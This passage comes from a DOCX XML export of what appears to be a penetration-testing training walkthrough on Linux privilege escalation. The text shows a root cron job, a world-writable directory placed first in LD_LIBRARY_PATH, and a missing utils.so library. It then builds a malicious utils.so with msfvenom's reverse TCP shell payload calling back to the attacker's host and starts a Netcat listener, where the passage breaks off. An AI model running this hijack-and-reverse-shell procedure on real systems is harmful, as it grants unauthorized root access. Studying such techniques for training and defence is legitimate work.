    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/sbin:/bin:/usr/sbin:/usr/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MAILTO=""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># For details see man 4 crontabs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Example of job definition:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># .---------------- minute (0 - 59)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  .------------- hour (0 - 23)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  .---------- day of month (1 - 31)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># *  *  *  *  * user-name  command to be executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  *  *  *  *  * root       /usr/bin/log-sweeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also note that this crontab file includes a custom </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_LIBRARY_PATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable which adds </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/utils</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the list of locations to search for library files. If we check these paths, we find that we only have write access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is perfect for our use since it appears first in the path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /usr/local/lib/dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">total 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxrwxrwx  2 root root  6 Sep  7 01:50 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 4 root root 30 Sep  7 01:50 ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /usr/local/lib/utils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">total 4.0K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 2 root root  22 Sep  7 01:46 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 4 root root  30 Sep  7 01:50 ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwxr-xr-x. 1 root root 476 Sep  7 01:47 utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The list of shared objects loaded by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/log-sweeper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">utils.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shared object which may be a good candidate for hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /usr/bin/log-sweeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        linux-vdso.so.1 =&gt;  (0x00007ffd61a5c000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        utils.so =&gt; not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        libc.so.6 =&gt; /lib64/libc.so.6 (0x00007f717136a000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        /lib64/ld-linux-x86-64.so.2 (0x00007f7171738000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">log-sweeper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cron job, all we need to do is generate a malicious shared object file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">utils.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and place it in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. First, we'll generate our malicious shared object file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=kali LPORT=6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] No arch selected, selecting arch: x64 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size: 74 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Final size of elf-so file: 476 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Saved as: utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a Netcat handler to catch our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
